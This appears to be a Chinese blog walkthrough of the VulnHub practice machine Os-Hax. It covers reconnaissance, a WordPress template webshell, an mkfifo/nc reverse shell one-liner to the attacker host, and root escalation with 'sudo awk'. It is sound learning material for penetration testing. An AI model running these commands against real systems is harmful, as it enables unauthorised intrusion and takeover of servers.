Os-Hax靶机测试

已于 2023-04-08 09:53:33 修改
阅读量263 收藏 2
点赞数 2
分类专栏: 靶机测试 文章标签: 网络安全 安全 web安全 系统安全
于 2023-04-08 09:48:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58729813/article/details/130024738
版权

一.涉及的知识点

1.信息收集:端口扫描,目录扫描,图片信息查看

2.后台拿webshell

3.linux提权:sudo提权

二.实验环境

kali:10.77.74.14

靶机下载地址:hackNos: Os-Hax ~ VulnHub

三.信息收集

1.找到靶机的ip

第一种方法:使用netdiscover网络扫描工具:netdiscover -i 网卡名 -r ip网段

#-i参数后面网卡名

#-r参数后面跟ip网段

netdiscover -i eth0 -r 10.77.74.0/24

扫描的结果如下:10.77.74.237就是靶机的ip

第二种方法:nmap扫描整个网段

nmap ip网段

nmap 10.77.74.0/24

2.端口扫描

nmap -sV -sC -A ip

#-sV:对端口上的服务程序版本进行扫描

#-sC:使用脚本进行扫描,耗时长

#-A:强力扫描

#-oA:将nmap输出保存为三种主要格式

nmap -A -sV -sC 10.77.74.237 -oA Os-Hax

结果是有80端口和22端口

3.目录扫描

gobuster dir -u ip -w 字典

gobuster dir -u http://10.77.74.237 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

#这里选用kali自带的字典

查看结果:扫出了wordpress,image,css,js,html

访问wordpress,发现网站的布局很奇怪

查看源码,发现css的定义路径都为localhost

所以我们去etc/hosts文件绑定hosts,将localhost绑定为对方网站的ip

再打开网页看看,发现没什么问题

这里还发现了个web用户

4.图片信息查看

在刚才的目录扫描中,还有一个/img目录,访问看看,发现有一个可疑的照片flaghost.png

 下载后用exiftool工具查看图片详细信息

 也可以用strings查看图片的详细信息

 通过以上两种方式能得到字符passw@45

拿到passw@45,尝试后台wordpress登录,发现不行

 passw@45也可能是个目录,访问一下,发现它确实是一个目录

 打开flag2.txt,解密,得到信息

利用解密出来的信息登录wordpress后台,发现成功

 四.后台拿webshell

1.思路:

这套程序是一个wordpress,可以查查wordpress后台拿webshell.wordpress比较常见,可以积累积累,以后碰见wordpress后台拿shell就更快了.

 同样为了方便查找路径和分析,也可以去网上下载源码

 2.wordpress后台修改模板拿webshell

找到修改模板的地方

 修改404.php,将一句话木马插进去

 查找404.php的位置:这时可以利用源码,由于是在Twenty Nineteen,我们可以在源码快速找到

 访问404.php,成功

 五.提权提升

1.反弹shell

(1)kali机:

bash(为什么先bash后面会说明)

使用nc命令进行监听

nc -lvnp 6666

#-l:用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

#-p:指定端口

#-v:输出交互或出错信息,新手调试时尤为有用

#-n:仅数字IP地址,无DNS

 (2)在对方的shell执行nc反弹:nc反弹的命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.77.74.14 6666 >/tmp/f

抓包,执行反弹shell命令

 

2.拿到shell出现的两个问题

(1)无法执行su登录

终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行

(2)当按上下左右键时会出现乱码

3.解决shell出现的两个问题

方法:

(1)在kaili使用bash-shell:输入命令bash

(2)使用nc进行监听: nc -lvnp 6666

(3)对方nc反弹

 (4)得到反弹shell后进行python虚拟化终端,看对方是python3还是python

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

(5)使用ctrl+z把得到的反弹shell放到后台

(6)设置原始格式:stty -echo raw

(7)fg再回车调用后台任务

 4.尝试用刚才获得的账号密码登录

web:Hacker@4514,登录,发现成功

 读取flag

 5.sudo提权

在我们得到账号后,可以尝试sudo提权

sudo -l:列出目前用户可执行与无法执行的指令,以及有root权限但不用密码的操作

sudo -l,发现awk不用密码且有root权限

 awk提权:

sudo awk 'BEGIN {system("/bin/bash")}'

 读取final.txt

 六.总结

1.信息收集:

端口扫描和目录扫描端口扫描主要学习nmap工具,学习一些常用的参数

目录扫描有很多工具,例如本次使用的gobuster,还有7kbstorm,dirsearch,dirsearch

2.后台拿webshell:

首先,先考虑进入后台,可以通过sql注入得到账号密码,穷举看看有无弱口令或者说信息泄露等方式.然后掌握后台拿webshell可能存在的地方,例如:修改模板文件,上传压缩文件然后自解压,修改系统配置文件,日志等待都可能能拿到webshell.也可以积累一些常见后台拿webshell的方法,例如wordpress,dedecms等等

3.linux提权:

本次靶机是有账号的前提下,进行了sudo提权的利用,且sudo提权的原理是/etc/sudoers文件配置不当.当然还有很多linux提权的方法,例如:suid提权,环境劫持,passwd提权,计划任务提权等,需要我们掌握利用方式和原理.

weixin_58729813
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub—Os-Hax
weixin_39219503的博客
01-05 386
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 题目信息如下,难度中等 Back To The Top Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege Es...
靶机渗透日记 hackNos: Os-Hax
Anonymous
02-07 241
靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 文章目录信息收集Getshell方法一方法二提权参考链接 信息收集 ip 端口 目录扫描 发现存在 wordpress 使用 wpscan 发现存在 web 用户 没有发现插件 在 /img 目录下存在 flaghost.png 用exiftool查看了一下图片信息 exiftool flaghost.png 可能是 web 用户的密码,尝试后发现是路径
DC-5靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
05-27 1900
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
Vulnhub-Os-hax
wwxxss
03-16 148
使用strings查看图片的信息 strings 命令在对象文件或二进制文件中查找可打印的字符串。gobuster dir -iu "http:192.168.56.106/" -w 字典 -x 格式( html,txt,bak,php)根据提示我们可以发现是一个wordpress站点,所以我们可以扫描wordpress站点下的目录。结果并没有什么发现,通过wp发现在根目录下有个img目录有个flaghost.png,我们使用。得到了一个brainfuck加密的密码,我们丢到解密网站解开查看。
靶机Os-Hax测试笔记
qq_56426046的博客
01-05 497
下载ova文件,直接virtual Box打开,可能现一些问题,关闭USB选择网络模式等等。网络用桥接,开启过程没有失败,可以访问网站代表搭建成功。首先编辑 vi /etc/hosts 192.168.1.102 localhost 访问。访问目录 /img/发现存在目录写浏览。修改/etc/sudoers 文件。修改/etc/sudoers 文件。切换 python shell。
2021-06-13OS-Hax靶机学习
qq_45290991的博客
06-13 425
靶机地址 难度:初级 靶机发布日期:2019年11月1日 靶机描述:Contact… https://www.linkedin.com/in/rahulgehlaut/ For any Error This works better in VirtualBox than VM...
Schlauer-Hax
03-17
你好呀! :hourglass_not_done: {████████████████░░░░░░░░░░░░░░}-55.07%-月进度 :hourglass_not_done: {██████░░░░░░░░░░░░░░░░░░░░░░░░}-20.69...
XF86Config-hax-开源
05-03
标题中的“XF86Config-hax-开源”表明这是一个与开源相关的项目,主要涉及X Window系统中的XF86Config配置文件。在X Window系统中,XF86Config(或者在某些较新版本中称为xorg.conf)是控制图形适配器(即显卡)和...
Steak-Hax:TDC制造的Minecraft骇客客户端
03-07
牛排骗局 网站: : (会添加很多东西) 什么是牛排骗局? Catch-21是Minecraft 1.8被黑的客户端! ... 对于旧版本, 推荐的纹理包 , Windows: 要进行安装,按WINDOWKEY + R并在其中粘贴%appdata%/。...
Yak-Hax:通过Java的YikYakAPI接口
05-12
k牛哈克斯Yak Hax是Java中Yik Yak API的非官方vwrapper。下载与安装Yak Hax没有Maven存储库。 为了下载该库,您可以克隆或下载该存储库,位于releases / release.jar下,并将其包含在您的构建路径中。 否则,只需在...
restored-external-hax:更容易构建xerub的sshrd
05-07
restore_external_hax 这基本上是的一个。 我之所以没有派遣它,只是因为我的版本使用了src /文件夹等。 所有这些不同的是将设备上的SSH端口从2222更改为22。哦,是的,这也使它的编译更加容易,并且为您完成了很多...
oscp——hackNos: Os-Hax
王嘟嘟的博客
02-03 825
0x00 前言 这个是第十九台机子了, 不知不觉已经做了这么多东西了。 最后,我们来一个现学现用 Dear E-Commerce professional ; This letter was specially selected to be sent to you . We will comply with all removal requests ! This mail is being sen...
『VulnHub系列』Os-Hax: 1-Walkthrough
ins1ght的博客
11-12 1028
靶机发布日期:2019年11月1日,难度:初级。目录猜解之后发现了flaghost.png,exiftool发现了passw@45。访问passw@45目录之后得到Brainfuck编码的WordPress用户名和密码,登录后台之后在404.php中写入反弹shell的代码。
vulnhub靶机Os-hackNos
timesleep的博客
12-13 485
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
『VulnHub系列』hackNos: Os-hackNos-Walkthrough
ins1ght的博客
11-22 1092
靶机发布日期:2019年11月3日,难度:初级。目录枚举之后发现drupal和alexander.txt。对alexander.txt中的内容先后进行base64解码、brainfuck解码后得到账号密码(没用上)。火狐插件Wappalyzer发现drupal版本是7,MSF直接getshell。之后发现SUID权限的wget。
symfonos靶机
haha1314的博客
08-10 761
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
vulnhub靶机 Os-Hax
qq_52178795的博客
06-18 101
本篇重点,反弹shell awk提权
DC-1靶机渗透
weixin_62485906的博客
06-23 1298
关于kali渗透DC-1靶机
对DriftingBlues-2靶机进行渗透测试
zll___的博客
04-01 218
对DriftingBlues-2靶机进行渗透测试
[WinError 5] 拒绝访问。: 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\pip-unpack-1hax6tn4\\notebook-7.0.3-py3-none-any.whl'
09-04
[WinError 5] 拒绝访问是一个错误消息,意味着你没有足够的权限来访问或操作指定的文件或目录。这个错误通常发生在你试图安装或卸载Python包时。根据引用和引用的信息,建议你尝试以下方法来解决这个问题: 1. 使用--user选项: 在安装或卸载包时,使用--user选项可以将包安装到当前用户的目录中,而不是全局目录。这通常可以避免权限问题。示例命令如下: ``` pip install package_name --user ``` 2. 检查权限: 确保你拥有足够的权限来访问指定的文件或目录。可以尝试以管理员身份运行命令提示符或终端,并使用管理员权限运行安装或卸载命令。 另外,引用提供了一些解决Python PermissionError: [WinError 5]拒绝访问问题的步骤,你也可以参考这个参考资料来解决你的问题。希望这些方法对你有所帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [python更新库遇到ERROR: [WinError 5] 拒绝访问。Consider using the `--user` option or check the ...](https://blog.csdn.net/sophiasofia/article/details/129739335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ERROR: Could not install packages due to an OSError: [WinError 5] 拒绝访问。: ‘C:\\Users\\zlr\\App...](https://blog.csdn.net/zlrhhh/article/details/127915930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [三步解决python PermissionError: [WinError 5]拒绝访问的情况](https://download.csdn.net/download/weixin_38557095/12852977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值